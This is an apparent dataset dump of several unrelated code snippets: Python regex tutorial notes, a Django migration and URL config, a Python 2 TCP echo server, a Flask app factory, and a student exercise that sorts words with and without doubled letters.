result = re.search(r'[\w.-]+\@1[2-9]+', 'x@122') # found: x@122
result = re.search(r'[\w.-]+\@[\w-]+\.[\w]+', 'mukesh_khattar.k@swd-edc.com') # found: mukesh_khattar.k@swd-edc.com
# Inside a set, ^ in a set means exclude. In a normal use (r'^str' ) means starting with
# example - [^arn] Returns a match for any character EXCEPT a, r, and n
result = re.search(r'[^arn]', 'rit is aining')
result[0] # i
# escape [] if it is patterns e.g. if we need '[process id]' in the line below
line ='sqxwc wecwec[12121] xwcwecc'
result=re.search(r'\[\d+\]',line)
# print the result using one of the following
result.group(0) # '[12121]'
result[0] # '12121'
#in abobe if just process_id is needed
line ='sqxwc wecwec[12121] xwcwecc'
result=re.search(r'\[(\d+)\]',line)
result[0] # '[12121]'
result[1] # '12121'
#[a-zA-Z] - one char of a-z or A_Z
# ^ ; start of string
result = re.search(r'^[a-zA-Z][\w._-]+\@[\w_-]+\.[\w]+', 'mukesh_khattar.k@swd-edc.com') # found: mukesh_khattar.k@swd-edc.com
result = re.search(r'^[a-zA-Z][\w._-]+\@[\w_-]+\.[\w]+', '1mukesh_khattar.k@swd-edc.com') # not found
# '-' need to be escaped in set. + and . lose its special meaning when used isnide a set
pattern = '[\w\-+.]+\.[a-zA-Z]+'
result=re.search(pattern, 'a_b-c+d.wdwd.com')
result[0]
# the hour is between 1 and 12, with no leading zero, followed by a colon, then minutes between 00 and 59, then an optional space, and then AM or PM, in upper or lower case.
pattern = '([1]?[0-9]):([0-5][0-9])( ?)[AaPp][Mm]'
result = re.search(pattern, '2:29 PM')
result[0]
result[1]
result[2]
result[3]
result[4] # error — IndexError: this pattern defines only 3 capture groups
# OR condition use | . eg. first char needs to be upper char or digit AND two or more chars AND surrounded by ()
pattern = '\(([A-Z]|[0-9])[\w]+\)'
result = re.search(pattern, "wdwd(1aM)wdw") # True
result = re.search(pattern, "wdwd(AM)wdw") # True
result = re.search(pattern, "wdwd(aswd)wdw") # False
# ^- start of string , $ - end of string
#the text passed qualifies as a top-level web address, meaning that it contains alphanumeric characters (which includes
# letters, numbers, and underscores), as well as periods, dashes, and a plus sign,
# followed by a period and a character-only top-level domain such as ".com", ".info", ".edu", et
pattern = '^([\w\-+\.]+)\/([a-zA-Z]+)$'
result = re.search(pattern, "web-addres.com/homepage") # True
result[0]
'''
group Extraction
Group result e.g. for email address (username_pattern)@(host_pattern)
The "group" feature of a regular expression allows you to pick out parts of the resulting text.
'''
str = 'purple alice-b@google.com monkey dishwasher' # NOTE(review): shadows the builtin str
result = re.search(r'([\w.-]+)@([\w.-]+)', str)
result[0] ## 'alice-b@google.com' (the whole result)
#extract groups, eq:
result[1] #'alice-b' (the username, group 1)
# eq:
result[2] ## 'google.com' (the host, group 2)
# pattern to find ln, fn where fn should include
# '-' does not need to be escaped if it is first or last char in set
name = 'last-name, firstname M.'
result = re.search(r'^([\w\s-]+), ([\w\s\.]+)$', name)
result[0]
result[1]
result[2]
# exact specified number of instances
zip='here it is 12121' # NOTE(review): shadows the builtin zip
result = re.search(r'\d{5}', zip)
result[0] # '12121'
zip='as 1212 ss'
result = re.search(r'\d{5}', zip)
result[0] # NOTE(review): no match above, so result is None and this raises TypeError (not "None" as the original comment suggested)
# exactly 5 digits, and sometimes, but not always, followed by a dash with 4 more digits.
# The zip code needs to be preceded by at least one space, and cannot be at the start of the text.
#pattern = '(\w)+(\s)+[0-9][0-9][0-9][0-9][0-9](([-][0-9][0-9][0-9][0-9])|(\s))'
pattern = '(\w)+(\s)+[0-9]{5}(([-][0-9]{4})|(\s))'
result = re.search(pattern, "a 21212-0991 wdw") # True
result[0]
result = re.search(pattern, "a 21212 wdw") # True
result[0]
result = re.search(pattern, "a 2122 wdw") # False
if result:
    result[0]
'''
findall() is probably the single most powerful function in the re module.
Above we used re.search() to find the first result for a pattern.
findall() finds *all* the resultes and returns them as a list of strings, with each string representing one result.
'''
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
## Here re.findall() returns a list of all the found email strings
emails = re.findall(r'[\w\.-]+@[\w\.-]+', str) ## ['alice@google.com', 'bob@abc.com']
for email in emails:
    # do something with each found email string
    print (email)
# findall and groups
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
tuples = re.findall(r'([\w\.-]+)@([\w\.-]+)', str)
print (tuples) ## [('alice', 'google.com'), ('bob', 'abc.com')]
for tuple in tuples: # NOTE(review): loop variable shadows the builtin tuple
    tuple
    print (tuple[0]) ## username
    print (tuple[1]) ## host
'''
findall() with files
example below extracts IP addresses from apache file
'''
# Open file
# NOTE(review): machine-specific absolute path — this open() fails anywhere else
f = open('/Users/mukeshkhattar/github_public_repos/examples/Common Data Formats/apache_logs/apache_logs', 'r')
# Feed the file text into findall(); it returns a list of all the found strings
strings = re.findall(r'[\d]+\.[\d]+\.[\d]+\.[\d]', f.read())
print(strings)
#subtir=tution
# this code updates emailaddresses with domain name
str = 'purple alice@google.com, blah monkey bob@abc.com blah dishwasher'
## re.sub(pat, replacement, str) -- returns new string with all replacements,
## purple alice@yo-yo-dyne.com, blah monkey bob@yo-yo-dyne.com blah dishwasher
#method:1
## \1 is group(1), \2 group(2) in the replacement
result=re.sub(r'([\w\.-]+)@([\w\.-]+)', r'\1@yo-yo-dyne.com', str)
result
str
#method:2
print (re.sub(r'@[\w\.-]+', r'@yo-yo-dyne.com', str))
# The split() function returns a list where the string has been split at each match:
#split at each whitespace:
txt = "The rain in Spain"
x = re.split("\s", txt)
x # ['The', 'rain', 'in', 'Spain']
#split with maxsplit parameter
#split at first whitespace occurance
txt = "The rain in Spain"
x = re.split("\s", txt, 1)
x # ['The', 'rain in Spain']
# substitute function
# replace whitespace with 9
txt = "The rain in Spain"
x = re.sub("\s", "9", txt) # 'The9rain9in9Spain'
x
# You can control the number of replacements by specifying the count parameter:
txt = "The rain in Spain"
x = re.sub("\s", "9",txt,2)
x # 'The9rain9in Spain'
|
23,194 | 712fead0f865182fe8d1ef97dd3c0428212cc05e | # Generated by Django 3.2.4 on 2021-07-06 02:05
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('productName', models.CharField(max_length=100)),
('productQuantity', models.CharField(max_length=10)),
('stock', models.IntegerField()),
('price', models.FloatField(max_length=100)),
('image', models.ImageField(upload_to='images/')),
],
),
]
|
23,195 | 759fa31d4e859de60779b684c79dbcd7db2f2167 | import SocketServer
import struct
from lib.tcpmessage import TCPMessage
class EchoServer(SocketServer.BaseRequestHandler):
    """Python 2 TCP handler: reads one length-prefixed TCPMessage and prints it."""
    def handle(self):
        """Read a 2-byte big-endian length header, then the payload, and decode it."""
        # Try to get the message length (2 bytes)
        len_buf = self.read(self.request, 2)
        # "!H" = network byte order, unsigned 16-bit: max message size 65535 bytes.
        msg_len = struct.unpack("!H", len_buf)[0]
        data = self.read(self.request, msg_len).strip()
        m = TCPMessage()
        m.decode(data)
        print m
    def read(self, socket, length):
        """Read exactly `length` bytes from `socket`; raise if the peer closes early."""
        buf = ""
        while length > 0:
            # recv may return fewer bytes than requested, so loop until done.
            data = socket.recv(length)
            if data == "":
                raise RuntimeError("Connection closed!")
            buf += data
            length -= len(data)
        return buf
if __name__ == "__main__":
    # Serve on localhost:5200; serve_forever() blocks until interrupted.
    server = SocketServer.TCPServer(("localhost", 5200), EchoServer)
    server.serve_forever()
|
23,196 | 29a7a9f8585519d248c11d75855f397b2383a937 | ii = [('LyelCPG2.py', 2), ('MarrFDI.py', 1), ('GodwWSL2.py', 1), ('CookGHP.py', 1), ('ChalTPW2.py', 1), ('LyelCPG.py', 2), ('DibdTRL2.py', 2), ('WadeJEB.py', 1), ('WilbRLW3.py', 1), ('MereHHB2.py', 1)] |
23,197 | 6ff62b4896c11c8114cca7faab214f080f040083 | import os
from flask import Flask
from dotenv import load_dotenv
def create_app():
    """Application factory: load the .env file, configure and return the Flask app."""
    # The .env file lives one directory above this package.
    env_file = os.path.join(os.path.dirname(__file__), '..', '.env')
    load_dotenv(env_file)

    flask_app = Flask(__name__, template_folder='templates')
    for key in ('CSRF_SESSION_KEY', 'SECRET_KEY'):
        flask_app.config[key] = os.environ.get(key)

    # Imported inside the factory to avoid a circular import at module load time.
    from app.controllers import app as app_module
    flask_app.register_blueprint(app_module)
    return flask_app
|
23,198 | f5dc2354f87ce84e6510a8546a27be597d821cb1 | # coding: utf-8
# Student: Héricles Emanuel
# Enrollment: 117110647
# Assignment: Words with Doubled Letters
# Python 2 script: reads N words and partitions them by whether they contain
# two identical adjacent letters, then prints both groups.
num_palavras = int(raw_input())
list_dobrada = []
list_nao_dobrada = []
for i in range(0, num_palavras):
    dobradas = 0
    palavra = raw_input()
    # Scan adjacent pairs; stop at the first doubled pair found.
    for letra in range(0, len(palavra) - 1):
        if palavra[letra] == palavra [letra + 1]:
            dobradas += 1
            break
    if dobradas > 0:
        list_dobrada.append(palavra)
    else:
        list_nao_dobrada.append(palavra)
print "%i palavra(s) com letras dobradas:" % len(list_dobrada)
for i in range(0, len(list_dobrada)):
    print list_dobrada[i]
print "---"
print "%i palavra(s) sem letras dobradas:" % len(list_nao_dobrada)
for i in range(0, len(list_nao_dobrada)):
    print list_nao_dobrada[i]
|
23,199 | 1e2d1d24ba98b38d5cc760a5d368419be33bf030 | from django.urls import path,include
from hotel_app import views
# Route table for hotel_app: maps URL paths to class-based and function views.
urlpatterns =[
    path('',views.BaseView.as_view(),name='base'),
    path('home/',views.IndexView.as_view(),name='index'),
    path('register/',views.register,name='register'),
    path('user_login/',views.user_login,name='user_login'),
    path('advance_booking/',views.advance_booking,name='advance_booking'),
    path('about/',views.about,name='about'),
    path('thank/',views.thank,name = 'thank'),
    path('room_terrif/',views.room_terrif,name='room_terrif'),
    path('other/',views.other,name='other'),
]
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.